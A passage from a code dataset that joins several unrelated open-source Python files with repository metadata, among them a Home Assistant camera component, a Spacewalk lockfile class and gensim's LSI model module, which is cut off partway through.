elif type(data) == np.ndarray and len(data.shape) == 2 and data.shape[0] == 1:
# 2D array, hieght 1
y = data[0]
elif type(data) == np.ndarray and len(data.shape) == 2 and data.shape[1] == 1:
# 2D array, width 1
y = data[:,0]
else:
x, y = ivi.get_sig(data)
if len(y) % self._arbitrary_waveform_quantum != 0:
raise ivi.ValueNotSupportedException()
raw_data = b''
for f in y:
# clip at -1 and 1
if f > 1.0: f = 1.0
if f < -1.0: f = -1.0
raw_data = raw_data + struct.pack('<f', f)
self._write_ieee_block(raw_data, ':%s:arbitrary:data ' % self._output_name[index])
return self._output_name[index]
| Diti24/python-ivi | ivi/agilent/agilent3000A.py | Python | mit | 6,792 |
# -*- coding: utf-8 -*-
###############################################################################
#
# Copyright (C) 2001-2014 Micronaet SRL (<http://www.micronaet.it>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published
# by the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
###############################################################################
from . import used
from . import report
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| Micronaet/micronaet-production | mrp_future_used_material/__init__.py | Python | agpl-3.0 | 1,054 |
# pylint: disable=too-many-lines
"""
Component to interface with cameras.
For more details about this component, please refer to the documentation at
https://home-assistant.io/components/camera/
"""
import asyncio
import logging
from aiohttp import web
from homeassistant.helpers.entity import Entity
from homeassistant.helpers.entity_component import EntityComponent
from homeassistant.helpers.config_validation import PLATFORM_SCHEMA # noqa
from homeassistant.components.http import HomeAssistantView
DOMAIN = 'camera'
DEPENDENCIES = ['http']
SCAN_INTERVAL = 30
ENTITY_ID_FORMAT = DOMAIN + '.{}'
STATE_RECORDING = 'recording'
STATE_STREAMING = 'streaming'
STATE_IDLE = 'idle'
ENTITY_IMAGE_URL = '/api/camera_proxy/{0}?token={1}'
@asyncio.coroutine
def async_setup(hass, config):
"""Setup the camera component."""
component = EntityComponent(
logging.getLogger(__name__), DOMAIN, hass, SCAN_INTERVAL)
hass.http.register_view(CameraImageView(hass, component.entities))
hass.http.register_view(CameraMjpegStream(hass, component.entities))
yield from component.async_setup(config)
return True
class Camera(Entity):
"""The base class for camera entities."""
def __init__(self):
"""Initialize a camera."""
self.is_streaming = False
@property
def access_token(self):
"""Access token for this camera."""
return str(id(self))
@property
def should_poll(self):
"""No need to poll cameras."""
return False
@property
def entity_picture(self):
"""Return a link to the camera feed as entity picture."""
return ENTITY_IMAGE_URL.format(self.entity_id, self.access_token)
@property
def is_recording(self):
"""Return true if the device is recording."""
return False
@property
def brand(self):
"""Camera brand."""
return None
@property
def model(self):
"""Camera model."""
return None
def camera_image(self):
"""Return bytes of camera image."""
raise NotImplementedError()
@asyncio.coroutine
def async_camera_image(self):
"""Return bytes of camera image.
This method must be run in the event loop.
"""
image = yield from self.hass.loop.run_in_executor(
None, self.camera_image)
return image
@asyncio.coroutine
def handle_async_mjpeg_stream(self, request):
"""Generate an HTTP MJPEG stream from camera images.
This method must be run in the event loop.
"""
response = web.StreamResponse()
response.content_type = ('multipart/x-mixed-replace; '
'boundary=--jpegboundary')
yield from response.prepare(request)
def write(img_bytes):
"""Write image to stream."""
response.write(bytes(
'--jpegboundary\r\n'
'Content-Type: image/jpeg\r\n'
'Content-Length: {}\r\n\r\n'.format(
len(img_bytes)), 'utf-8') + img_bytes + b'\r\n')
last_image = None
try:
while True:
img_bytes = yield from self.async_camera_image()
if not img_bytes:
break
if img_bytes is not None and img_bytes != last_image:
write(img_bytes)
# Chrome seems to always ignore first picture,
# print it twice.
if last_image is None:
write(img_bytes)
last_image = img_bytes
yield from response.drain()
yield from asyncio.sleep(.5)
finally:
yield from response.write_eof()
@property
def state(self):
"""Camera state."""
if self.is_recording:
return STATE_RECORDING
elif self.is_streaming:
return STATE_STREAMING
else:
return STATE_IDLE
@property
def state_attributes(self):
"""Camera state attributes."""
attr = {
'access_token': self.access_token,
}
if self.model:
attr['model_name'] = self.model
if self.brand:
attr['brand'] = self.brand
return attr
class CameraView(HomeAssistantView):
"""Base CameraView."""
requires_auth = False
def __init__(self, hass, entities):
"""Initialize a basic camera view."""
super().__init__(hass)
self.entities = entities
@asyncio.coroutine
def get(self, request, entity_id):
"""Start a get request."""
camera = self.entities.get(entity_id)
if camera is None:
return web.Response(status=404)
authenticated = (request.authenticated or
request.GET.get('token') == camera.access_token)
if not authenticated:
return web.Response(status=401)
response = yield from self.handle(request, camera)
return response
@asyncio.coroutine
def handle(self, request, camera):
"""Hanlde the camera request."""
raise NotImplementedError()
class CameraImageView(CameraView):
"""Camera view to serve an image."""
url = "/api/camera_proxy/{entity_id}"
name = "api:camera:image"
@asyncio.coroutine
def handle(self, request, camera):
"""Serve camera image."""
image = yield from camera.async_camera_image()
if image is None:
return web.Response(status=500)
return web.Response(body=image)
class CameraMjpegStream(CameraView):
"""Camera View to serve an MJPEG stream."""
url = "/api/camera_proxy_stream/{entity_id}"
name = "api:camera:stream"
@asyncio.coroutine
def handle(self, request, camera):
"""Serve camera image."""
yield from camera.handle_async_mjpeg_stream(request)
| srcLurker/home-assistant | homeassistant/components/camera/__init__.py | Python | mit | 5,960 |
import os
os.system('cls')
opcao = 'c'
while opcao == 'c':
print("Opcao ==> c")
opcao = input("digite uma opcao: ") | ronas/PythonGNF | Artur/ExRev06.py | Python | gpl-3.0 | 132 |
#
# Copyright (c) 2008--2011 Red Hat, Inc.
#
# This software is licensed to you under the GNU General Public License,
# version 2 (GPLv2). There is NO WARRANTY for this software, express or
# implied, including the implied warranties of MERCHANTABILITY or FITNESS
# FOR A PARTICULAR PURPOSE. You should have received a copy of GPLv2
# along with this software; if not, see
# http://www.gnu.org/licenses/old-licenses/gpl-2.0.txt.
#
# Red Hat trademarks are not licensed under GPLv2. No permission is
# granted to use or replicate Red Hat trademarks that are incorporated
# in this software or its documentation.
#
import os
import sys
import fcntl
from errno import EWOULDBLOCK, EEXIST
import fcntl
class LockfileLockedException(Exception):
"""thrown ONLY when pid file is locked."""
pass
class Lockfile:
"""class that provides simple access to a PID-style lockfile.
methods: __init__(lockfile), acquire(), and release()
NOTE: currently acquires upon init
The *.pid file will be acquired, or an LockfileLockedException is raised.
"""
def __init__(self, lockfile, pid=None):
"""create (if need be), and acquire lock on lockfile
lockfile example: '/var/run/up2date.pid'
"""
# cleanup the path and assign it.
self.lockfile = os.path.abspath(
os.path.expanduser(
os.path.expandvars(lockfile)))
self.pid = pid
if not self.pid:
self.pid = os.getpid()
# create the directory structure
dirname = os.path.dirname(self.lockfile)
if not os.path.exists(dirname):
try:
os.makedirs(dirname)
except OSError, e:
if hasattr(e, 'errno') and e.errno == EEXIST:
# race condition... dirname exists now.
pass
else:
raise
# open the file -- non-destructive read-write, unless it needs
# to be created XXX: potential race condition upon create?
self.f = os.open(self.lockfile, os.O_RDWR|os.O_CREAT|os.O_SYNC)
self.acquire()
def acquire(self):
"""acquire the lock; else raise LockfileLockedException."""
try:
fcntl.flock(self.f, fcntl.LOCK_EX|fcntl.LOCK_NB)
except IOError, e:
if e.errno == EWOULDBLOCK:
raise LockfileLockedException(
"cannot acquire lock on %s." % self.lockfile), None, sys.exc_info()[2]
else:
raise
# unlock upon exit
fcntl.fcntl(self.f, fcntl.F_SETFD, 1)
# truncate and write the pid
os.ftruncate(self.f, 0)
os.write(self.f, str(self.pid) + '\n')
def release(self):
# Remove the lock file
os.unlink(self.lockfile)
fcntl.flock(self.f, fcntl.LOCK_UN)
os.close(self.f)
def main():
"""test code"""
try:
L = Lockfile('./test.pid')
except LockfileLockedException, e:
sys.stderr.write("%s\n" % e)
sys.exit(-1)
else:
print "lock acquired "
print "...sleeping for 10 seconds"
import time
time.sleep(10)
L.release()
print "lock released "
if __name__ == '__main__':
# test code
sys.exit(main() or 0)
| hustodemon/spacewalk | client/rhel/rhnlib/rhn/rhnLockfile.py | Python | gpl-2.0 | 3,331 |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Copyright (C) 2010 Radim Rehurek <radimrehurek@seznam.cz>
# Licensed under the GNU LGPL v2.1 - http://www.gnu.org/licenses/lgpl.html
"""
Module for Latent Semantic Analysis (aka Latent Semantic Indexing) in Python.
Implements fast truncated SVD (Singular Value Decomposition). The SVD
decomposition can be updated with new observations at any time, for an online,
incremental, memory-efficient training.
This module actually contains several algorithms for decomposition of large corpora, a
combination of which effectively and transparently allows building LSI models for:
* corpora much larger than RAM: only constant memory is needed, independent of
the corpus size
* corpora that are streamed: documents are only accessed sequentially, no
random access
* corpora that cannot be even temporarily stored: each document can only be
seen once and must be processed immediately (one-pass algorithm)
* distributed computing for very large corpora, making use of a cluster of
machines
Wall-clock `performance on the English Wikipedia <http://radimrehurek.com/gensim/wiki.html>`_
(2G corpus positions, 3.2M documents, 100K features, 0.5G non-zero entries in the final TF-IDF matrix),
requesting the top 400 LSI factors:
====================================================== ============ ==================
algorithm serial distributed
====================================================== ============ ==================
one-pass merge algorithm 5h14m 1h41m
multi-pass stochastic algo (with 2 power iterations) 5h39m N/A [1]_
====================================================== ============ ==================
*serial* = Core 2 Duo MacBook Pro 2.53Ghz, 4GB RAM, libVec
*distributed* = cluster of four logical nodes on three physical machines, each
with dual core Xeon 2.0GHz, 4GB RAM, ATLAS
.. [1] The stochastic algo could be distributed too, but most time is already spent
reading/decompressing the input from disk in its 4 passes. The extra network
traffic due to data distribution across cluster nodes would likely make it
*slower*.
"""
import logging
import sys
import numpy as np
import scipy.linalg
import scipy.sparse
from scipy.sparse import sparsetools
from gensim import interfaces, matutils, utils
from gensim.models import basemodel
from six import iterkeys
from six.moves import xrange
logger = logging.getLogger(__name__)
# accuracy defaults for the multi-pass stochastic algo
P2_EXTRA_DIMS = 100 # set to `None` for dynamic P2_EXTRA_DIMS=k
P2_EXTRA_ITERS = 2
def clip_spectrum(s, k, discard=0.001):
"""
Given eigenvalues `s`, return how many factors should be kept to avoid
storing spurious (tiny, numerically instable) values.
This will ignore the tail of the spectrum with relative combined mass < min(`discard`, 1/k).
The returned value is clipped against `k` (= never return more than `k`).
"""
# compute relative contribution of eigenvalues towards the energy spectrum
rel_spectrum = np.abs(1.0 - np.cumsum(s / np.sum(s)))
# ignore the last `discard` mass (or 1/k, whichever is smaller) of the spectrum
small = 1 + len(np.where(rel_spectrum > min(discard, 1.0 / k))[0])
k = min(k, small) # clip against k
logger.info("keeping %i factors (discarding %.3f%% of energy spectrum)",
k, 100 * rel_spectrum[k - 1])
return k
def asfarray(a, name=''):
if not a.flags.f_contiguous:
logger.debug("converting %s array %s to FORTRAN order", a.shape, name)
a = np.asfortranarray(a)
return a
def ascarray(a, name=''):
if not a.flags.contiguous:
logger.debug("converting %s array %s to C order", a.shape, name)
a = np.ascontiguousarray(a)
return a
class Projection(utils.SaveLoad):
def __init__(self, m, k, docs=None, use_svdlibc=False, power_iters=P2_EXTRA_ITERS, extra_dims=P2_EXTRA_DIMS):
"""
Construct the (U, S) projection from a corpus `docs`. The projection can
be later updated by merging it with another Projection via `self.merge()`.
This is the class taking care of the 'core math'; interfacing with corpora,
splitting large corpora into chunks and merging them etc. is done through
the higher-level `LsiModel` class.
"""
self.m, self.k = m, k
self.power_iters = power_iters
self.extra_dims = extra_dims
if docs is not None:
# base case decomposition: given a job `docs`, compute its decomposition,
# *in-core*.
if not use_svdlibc:
u, s = stochastic_svd(
docs, k, chunksize=sys.maxsize,
num_terms=m, power_iters=self.power_iters,
extra_dims=self.extra_dims)
else:
try:
import sparsesvd
except ImportError:
raise ImportError("`sparsesvd` module requested but not found; run `easy_install sparsesvd`")
logger.info("computing sparse SVD of %s matrix", str(docs.shape))
if not scipy.sparse.issparse(docs):
docs = matutils.corpus2csc(docs)
ut, s, vt = sparsesvd.sparsesvd(docs, k + 30) # ask for extra factors, because for some reason SVDLIBC sometimes returns fewer factors than requested
u = ut.T
del ut, vt
k = clip_spectrum(s**2, self.k)
self.u = u[:, :k].copy()
self.s = s[:k].copy()
else:
self.u, self.s = None, None
def empty_like(self):
return Projection(self.m, self.k, power_iters=self.power_iters, extra_dims=self.extra_dims)
def merge(self, other, decay=1.0):
"""
Merge this Projection with another.
The content of `other` is destroyed in the process, so pass this function a
copy of `other` if you need it further.
"""
if other.u is None:
# the other projection is empty => do nothing
return
if self.u is None:
# we are empty => result of merge is the other projection, whatever it is
self.u = other.u.copy()
self.s = other.s.copy()
return
if self.m != other.m:
raise ValueError("vector space mismatch: update is using %s features, expected %s" %
(other.m, self.m))
logger.info("merging projections: %s + %s", str(self.u.shape), str(other.u.shape))
m, n1, n2 = self.u.shape[0], self.u.shape[1], other.u.shape[1]
# TODO Maybe keep the bases as elementary reflectors, without
# forming explicit matrices with ORGQR.
# The only operation we ever need is basis^T*basis ond basis*component.
# But how to do that in scipy? And is it fast(er)?
# find component of u2 orthogonal to u1
logger.debug("constructing orthogonal component")
self.u = asfarray(self.u, 'self.u')
c = np.dot(self.u.T, other.u)
self.u = ascarray(self.u, 'self.u')
other.u -= np.dot(self.u, c)
other.u = [other.u] # do some reference magic and call qr_destroy, to save RAM
q, r = matutils.qr_destroy(other.u) # q, r = QR(component)
assert not other.u
# find the rotation that diagonalizes r
k = np.bmat([[np.diag(decay * self.s), np.multiply(c, other.s)],
[matutils.pad(np.array([]).reshape(0, 0), min(m, n2), n1), np.multiply(r, other.s)]])
logger.debug("computing SVD of %s dense matrix", k.shape)
try:
# in np < 1.1.0, running SVD sometimes results in "LinAlgError: SVD did not converge'.
# for these early versions of np, catch the error and try to compute
# SVD again, but over k*k^T.
# see http://www.mail-archive.com/np-discussion@scipy.org/msg07224.html and
# bug ticket http://projects.scipy.org/np/ticket/706
# sdoering: replaced np's linalg.svd with scipy's linalg.svd:
u_k, s_k, _ = scipy.linalg.svd(k, full_matrices=False) # TODO *ugly overkill*!! only need first self.k SVD factors... but there is no LAPACK wrapper for partial svd/eigendecomp in np :( //sdoering: maybe there is one in scipy?
except scipy.linalg.LinAlgError:
logger.error("SVD(A) failed; trying SVD(A * A^T)")
u_k, s_k, _ = scipy.linalg.svd(np.dot(k, k.T), full_matrices=False) # if this fails too, give up with an exception
s_k = np.sqrt(s_k) # go back from eigen values to singular values
k = clip_spectrum(s_k**2, self.k)
u1_k, u2_k, s_k = np.array(u_k[:n1, :k]), np.array(u_k[n1:, :k]), s_k[:k]
# update & rotate current basis U = [U, U']*[U1_k, U2_k]
logger.debug("updating orthonormal basis U")
self.s = s_k
self.u = ascarray(self.u, 'self.u')
self.u = np.dot(self.u, u1_k)
q = ascarray(q, 'q')
q = np.dot(q, u2_k)
self.u += q
# make each column of U start with a non-negative number (to force canonical decomposition)
if self.u.shape[0] > 0:
for i in xrange(self.u.shape[1]):
if self.u[0, i] < 0.0:
self.u[:, i] *= -1.0
# diff = np.dot(self.u.T, self.u) - np.eye(self.u.shape[1])
# logger.info('orth error after=%f' % np.sum(diff * diff))
#endclass Projection
class LsiModel(interfaces.TransformationABC, basemodel.BaseTopicModel):
"""
Objects of this class allow building and maintaining a model for Latent
Semantic Indexing (also known as Latent Semantic Analysis).
The main methods are:
1. constructor, which initializes the projection into latent topics space,
2. the ``[]`` method, which returns representation of any input document in the
latent space,
3. `add_documents()` for incrementally updating the model with new documents.
The left singular vectors are stored in `lsi.projection.u`, singular values
in `lsi.projection.s`. Right singular vectors can be reconstructed from the output
of `lsi[training_corpus]`, if needed. See also FAQ [2]_.
Model persistency is achieved via its load/save methods.
.. [2] https://github.com/piskvorky/gensim/wiki/Recipes-&-FAQ#q4-how-do-you-output-the-u-s-vt-matrices-of-lsi
"""
def __init__(self, corpus=None, num_topics=200, id2word=None, chunksize=20000,
decay=1.0, distributed=False, onepass=True,
power_iters=P2_EXTRA_ITERS, extra_samples=P2_EXTRA_DIMS):
"""
`num_topics` is the number of requested factors (latent dimensions).
After the model has been trained, you can estimate topics for an
arbitrary, unseen document, using the ``topics = self[document]`` dictionary
notation. You can also add new training documents, with ``self.add_documents``,
so that training can be stopped and resumed at any time, and the
LSI transformation is available at any point.
If you specify a `corpus`, it will be used to train the model. See the
method `add_documents` for a description of the `chunksize` and `decay` parameters.
Turn `onepass` off to force a multi-pass stochastic algorithm.
`power_iters` and `extra_samples` affect the accuracy of the stochastic
multi-pass algorithm, which is used either internally (`onepass=True`) or
as the front-end algorithm (`onepass=False`). Increasing the number of
power iterations improves accuracy, but lowers performance. See [3]_ for
some hard numbers.
Turn on `distributed` to enable distributed computing.
Example:
>>> lsi = LsiModel(corpus, num_topics=10)
>>> print(lsi[doc_tfidf]) # project some document into LSI space
>>> lsi.add_documents(corpus2) # update LSI on additional documents
>>> print(lsi[doc_tfidf])
.. [3] http://nlp.fi.muni.cz/~xrehurek/nips/rehurek_nips.pdf
"""
self.id2word = id2word
self.num_topics = int(num_topics)
self.chunksize = int(chunksize)
self.decay = float(decay)
if distributed:
if not onepass:
logger.warning("forcing the one-pass algorithm for distributed LSA")
onepass = True
self.onepass = onepass
self.extra_samples, self.power_iters = extra_samples, power_iters
if corpus is None and self.id2word is None:
raise ValueError('at least one of corpus/id2word must be specified, to establish input space dimensionality')
if self.id2word is None:
logger.warning("no word id mapping provided; initializing from corpus, assuming identity")
self.id2word = utils.dict_from_corpus(corpus)
self.num_terms = len(self.id2word)
else:
self.num_terms = 1 + max([-1] + self.id2word.keys())
self.docs_processed = 0
self.projection = Projection(self.num_terms, self.num_topics, power_iters=self.power_iters, extra_dims=self.extra_samples)
self.numworkers = 1
if not distributed:
logger.info("using serial LSI version on this node")
self.dispatcher = None
else:
if not onepass:
raise NotImplementedError("distributed stochastic LSA not implemented yet; "
"run either distributed one-pass, or serial randomized.")
try:
import Pyro4
dispatcher = Pyro4.Proxy('PYRONAME:gensim.lsi_dispatcher')
logger.debug("looking for dispatcher at %s", str(dispatcher._pyroUri))
dispatcher.initialize(id2word=self.id2word, num_topics=num_topics,
chunksize=chunksize, decay=decay,
power_iters=self.power_iters, extra_samples=self.extra_samples,
distributed=False, onepass=onepass)
self.dispatcher = dispatcher
self.numworkers = len(dispatcher.getworkers())
logger.info("using distributed version with %i workers", self.numworkers)
except Exception as err:
# distributed version was specifically requested, so this is an error state
logger.error("failed to initialize distributed LSI (%s)", err)
raise RuntimeError("failed to initialize distributed LSI (%s)" % err)
if corpus is not None:
self.add_documents(corpus)
def add_documents(self, corpus, chunksize=None, decay=None):
"""
Update singular value decomposition to take into account a new
corpus of documents.
Training proceeds in chunks of `chunksize` documents at a time. The size of
`chunksize` is a tradeoff between increased speed (bigger `chunksize`)
vs. lower memory footprint (smaller `chunksize`). If the distributed mode
is on, each chunk is sent to a different worker/computer.
Setting `decay` < 1.0 causes re-orientation towards new data trends in the
input document stream, by giving less emphasis to old observations. This allows
LSA to gradually "forget" old observations (documents) and give more
preference to new ones.
"""
logger.info("updating model with new documents")
# get computation parameters; if not specified, use the ones from constructor
if chunksize is None:
chunksize = self.chunksize
if decay is None:
decay = self.decay
if not scipy.sparse.issparse(corpus):
if not self.onepass:
# we are allowed multiple passes over the input => use a faster, randomized two-pass algo
update = Projection(self.num_terms, self.num_topics, None)
update.u, update.s = stochastic_svd(
corpus, self.num_topics,
num_terms=self.num_terms, chunksize=chunksize,
extra_dims=self.extra_samples, power_iters=self.power_iters)
self.projection.merge(update, decay=decay)
self.docs_processed += len(corpus) if hasattr(corpus, '__len__') else 0
else:
# the one-pass algo
doc_no = 0
if self.dispatcher:
logger.info('initializing %s workers', self.numworkers)
self.dispatcher.reset()
for chunk_no, chunk in enumerate(utils.grouper(corpus, chunksize)):
logger.info("preparing a new chunk of documents")
nnz = sum(len(doc) for doc in chunk)
# construct the job as a sparse matrix, to minimize memory overhead
# definitely avoid materializing it as a dense matrix!
logger.debug("converting corpus to csc format")
job = matutils.corpus2csc(chunk, num_docs=len(chunk), num_terms=self.num_terms, num_nnz=nnz)
del chunk
doc_no += job.shape[1]
if self.dispatcher:
# distributed version: add this job to the job queue, so workers can work on it
logger.debug("creating job #%i", chunk_no)
self.dispatcher.putjob(job) # put job into queue; this will eventually block, because the queue has a small finite size
del job
logger.info("dispatched documents up to #%s", doc_no)
else:
# serial version, there is only one "worker" (myself) => process the job directly
update = Projection(self.num_terms, self.num_topics, job, extra_dims=self.extra_samples, power_iters=self.power_iters)
del job
self.projection.merge(update, decay=decay)
del update
logger.info("processed documents up to #%s", doc_no)
self.print_topics(5)
# wait for all workers to finish (distributed version only)
if self.dispatcher:
logger.info("reached the end of input; now waiting for all remaining jobs to finish")
self.projection = self.dispatcher.getstate()
self.docs_processed += doc_no
# logger.info("top topics after adding %i documents" % doc_no)
# self.print_debug(10)
else:
assert not self.dispatcher, "must be in serial mode to receive jobs"
assert self.onepass, "distributed two-pass algo not supported yet"
update = Projection(self.num_terms, self.num_topics, corpus.tocsc(), extra_dims=self.extra_samples, power_iters=self.power_iters)
self.projection.merge(update, decay=decay)
logger.info("processed sparse job of %i documents", corpus.shape[1])
self.docs_processed += corpus.shape[1]
def __str__(self):
return "LsiModel(num_terms=%s, num_topics=%s, decay=%s, chunksize=%s)" % (
self.num_terms, self.num_topics, self.decay, self.chunksize)
def __getitem__(self, bow, scaled=False, chunksize=512):
"""
Return latent representation, as a list of (topic_id, topic_value) 2-tuples.
This is done by folding input document into the latent topic space.
If `scaled` is set, scale topics by the inverse of singular values (default: no scaling).
"""
assert self.projection.u is not None, "decomposition not initialized yet"
# if the input vector is in fact a corpus, return a transformed corpus as a result
is_corpus, bow = utils.is_corpus(bow)
if is_corpus and chunksize:
# by default, transform `chunksize` documents at once, when called as `lsi[corpus]`.
# this chunking is completely transparent to the user, but it speeds
# up internal computations (one mat * mat multiplication, instead of
# `chunksize` smaller mat * vec multiplications).
return self._apply(bow, chunksize=chunksize)
if not is_corpus:
bow = [bow]
# convert input to scipy.sparse CSC, then do "sparse * dense = dense" multiplication
vec = matutils.corpus2csc(bow, num_terms=self.num_terms, dtype=self.projection.u.dtype)
topic_dist = (vec.T * self.projection.u[:, :self.num_topics]).T # (x^T * u).T = u^-1 * x
# # convert input to dense, then do dense * dense multiplication
# # ± same performance as above (BLAS dense * dense is better optimized than scipy.sparse), but consumes more memory
# vec = matutils.corpus2dense(bow, num_terms=self.num_terms, num_docs=len(bow))
# topic_dist = np.dot(self.projection.u[:, :self.num_topics].T, vec)
# # use np's advanced indexing to simulate sparse * dense
# # ± same speed again
# u = self.projection.u[:, :self.num_topics]
# topic_dist = np.empty((u.shape[1], len(bow)), dtype=u.dtype)
# for vecno, vec in enumerate(bow):
# indices, data = zip(*vec) if vec else ([], [])
# topic_dist[:, vecno] = np.dot(u.take(indices, axis=0).T, np.array(data, dtype=u.dtype))
if not is_corpus:
# convert back from matrix into a 1d vec
topic_dist = topic_dist.reshape(-1)
if scaled:
topic_dist = (1.0 / self.projection.s[:self.num_topics]) * topic_dist # s^-1 * u^-1 * x
# convert a np array to gensim sparse vector = tuples of (feature_id, feature_weight),
# with no zero weights.
if not is_corpus:
# lsi[single_document]
result = matutils.full2sparse(topic_dist)
else:
# lsi[chunk of documents]
result = matutils.Dense2Corpus(topic_dist)
return result
def show_topic(self, topicno, topn=10):
"""
Return a specified topic (=left singular vector), 0 <= `topicno` < `self.num_topics`,
as a string.
Return only the `topn` words which contribute the most to the direction
of the topic (both negative and positive).
>>> lsimodel.show_topic(10, topn=5)
[("category", -0.340), ("$M$", 0.298), ("algebra", 0.183), ("functor", -0.174), ("operator", -0.168)]
"""
# size of the projection matrix can actually be smaller than `self.num_topics`,
# if there were not enough factors (real rank of input matrix smaller than
# `self.num_topics`). in that case, return an empty string
if topicno >= len(self.projection.u.T):
return ''
c = np.asarray(self.projection.u.T[topicno, :]).flatten()
norm = np.sqrt(np.sum(np.dot(c, c)))
most = matutils.argsort(np.abs(c), topn, reverse=True)
return [(self.id2word[val], 1.0 * c[val] / norm) for val in most]
def show_topics(self, num_topics=-1, num_words=10, log=False, formatted=True):
"""
Return `num_topics` most significant topics (return all by default).
For each topic, show `num_words` most significant words (10 words by default).
The topics are returned as a list -- a list of strings if `formatted` is
True, or a list of `(word, probability)` 2-tuples if False.
If `log` is True, also output this result to log.
"""
shown = []
if num_topics < 0:
num_topics = self.num_topics
for i in xrange(min(num_topics, self.num_topics)):
if i < len(self.projection.s):
if formatted:
topic = self.print_topic(i, topn=num_words)
else:
topic = self.show_topic(i, topn=num_words)
shown.append((i, topic))
if log:
logger.info("topic #%i(%.3f): %s", i, self.projection.s[i], topic)
return shown
def print_debug(self, num_topics=5, num_words=10):
"""
Print (to log) the most salient words of the first `num_topics` topics.
Unlike `print_topics()`, this looks for words that are significant for a
particular topic *and* not for others. This *should* result in a more
human-interpretable description of topics.
"""
# only wrap the module-level fnc
print_debug(
self.id2word, self.projection.u, self.projection.s,
range(min(num_topics, len(self.projection.u.T))),
num_words=num_words
)
def save(self, fname, *args, **kwargs):
"""
Save the model to file.
Large internal arrays may be stored into separate files, with `fname` as prefix.
Note: do not save as a compressed file if you intend to load the file back with `mmap`.
"""
if self.projection is not None:
self.projection.save(utils.smart_extension(fname, '.projection'), *args, **kwargs)
super(LsiModel, self).save(fname, *args, ignore=['projection', 'dispatcher'], **kwargs)
@classmethod
def load(cls, fname, *args, **kwargs):
"""
Load a previously saved object from file (also see `save`).
Large arrays can be memmap'ed back as read-only (shared memory) by setting `mmap='r'`:
>>> LsiModel.load(fname, mmap='r')
"""
kwargs['mmap'] = kwargs.get('mmap', None)
result = super(LsiModel, cls).load(fname, *args, **kwargs)
projection_fname = utils.smart_extension(fname, '.projection')
try:
result.projection = super(LsiModel, cls).load(projection_fname, *args, **kwargs)
except Exception as e:
logging.warning("failed to load projection from %s: %s" % (projection_fname, e))
return result
#endclass LsiModel
def print_debug(id2token, u, s, topics, num_words=10, num_neg=None):
if num_neg is None:
# by default, print half as many salient negative words as positive
num_neg = num_words / 2
logger.info('computing word-topic salience for %i topics', len(topics))
topics, result = set(topics), {}
# TODO speed up by block computation
for uvecno, uvec in enumerate(u):
uvec = np.abs(np.asarray(uvec).flatten())
udiff = uvec / np.sqrt(np.sum(np.dot(uvec, uvec)))
for topic in topics:
result.setdefault(topic, []).append((udiff[topic], uvecno))
logger.debug("printing %i+%i salient words", num_words, num_neg)
for topic in sorted(iterkeys(result)):
weights = sorted(result[topic], key=lambda x: -abs(x[0]))
_, most = weights[0]
if u[most, topic] < 0.0: # the most significant word has a negative sign => flip sign of u[most]
normalize = -1.0
else:
normalize = 1.0
# order features according to salience; ignore near-zero entries in u
pos, neg = [], []
for weight, uvecno in weights:
if normalize * u[uvecno, topic] > 0.0001:
pos.append('%s(%.3f)' % (id2token[uvecno], u[uvecno, topic]))
if len(pos) >= num_words:
break
for weight, uvecno in weights:
if normalize * u[uvecno, topic] < -0.0001:
neg.append('%s(%.3f)' % (id2token[uvecno], u[uvecno, topic]))
if len(neg) >= num_neg:
break
logger.info('topic #%s(%.3f): %s, ..., %s', topic, s[topic], ', '.join(pos), ', '.join(neg))
def stochastic_svd(corpus, rank, num_terms, chunksize=20000, extra_dims=None,
power_iters=0, dtype=np.float64, eps=1e-6):
"""
Run truncated Singular Value Decomposition (SVD) on a sparse input.
Return (U, S): the left singular vectors and the singular values of the input
data stream `corpus` [4]_. The corpus may be larger than RAM (iterator of vectors).
This may return less than the requested number of top `rank` factors, in case
the input itself is of lower rank. The `extra_dims` (oversampling) and especially
`power_iters` (power iterations) parameters affect accuracy of the decomposition.
This algorithm uses `2+power_iters` passes over the input data. In case you can only
afford a single pass, set `onepass=True` in :class:`LsiModel` and avoid using
this function directly.
The decomposition algorithm is based on
**Halko, Martinsson, Tropp. Finding structure with randomness, 2009.**
.. [4] If `corpus` is a scipy.sparse matrix instead, it is assumed the whole
corpus fits into core memory and a different (more efficient) code path is chosen.
"""
rank = int(rank)
if extra_dims is None:
samples = max(10, 2 * rank) # use more samples than requested factors, to improve accuracy
else:
samples = rank + int(extra_dims)
logger.info("using %i extra samples and %i power iterations", samples - rank, power_iters)
num_terms = int(num_terms)
# first phase: construct the orthonormal action matrix Q = orth(Y) = orth((A * A.T)^q * A * O)
# build Y in blocks of `chunksize` documents (much faster than going one-by-one
# and more memory friendly than processing all documents at once)
y = np.zeros(dtype=dtype, shape=(num_terms, samples))
logger.info("1st phase: constructing %s action matrix", str(y.shape))
if scipy.sparse.issparse(corpus):
m, n = corpus.shape
assert num_terms == m, "mismatch in number of features: %i in sparse matrix vs. %i parameter" % (m, num_terms)
o = np.random.normal(0.0, 1.0, (n, samples)).astype(y.dtype) # draw a random gaussian matrix
sparsetools.csc_matvecs(m, n, samples, corpus.indptr, corpus.indices,
corpus.data, o.ravel(), y.ravel()) # y = corpus * o
del o
# unlike np, scipy.sparse `astype()` copies everything, even if there is no change to dtype!
# so check for equal dtype explicitly, to avoid the extra memory footprint if possible
if y.dtype != dtype:
y = y.astype(dtype)
logger.info("orthonormalizing %s action matrix", str(y.shape))
y = [y]
q, _ = matutils.qr_destroy(y) # orthonormalize the range
logger.debug("running %i power iterations", power_iters)
for power_iter in xrange(power_iters):
q = corpus.T * q
q = [corpus * q]
q, _ = matutils.qr_destroy(q) # orthonormalize the range after each power iteration step
else:
num_docs = 0
for chunk_no, chunk in enumerate(utils.grouper(corpus, chunksize)):
logger.info('PROGRESS: at document #%i', (chunk_no * chunksize))
# construct the chunk as a sparse matrix, to minimize memory overhead
# definitely avoid materializing it as a dense (num_terms x chunksize) matrix!
s = sum(len(doc) for doc in chunk)
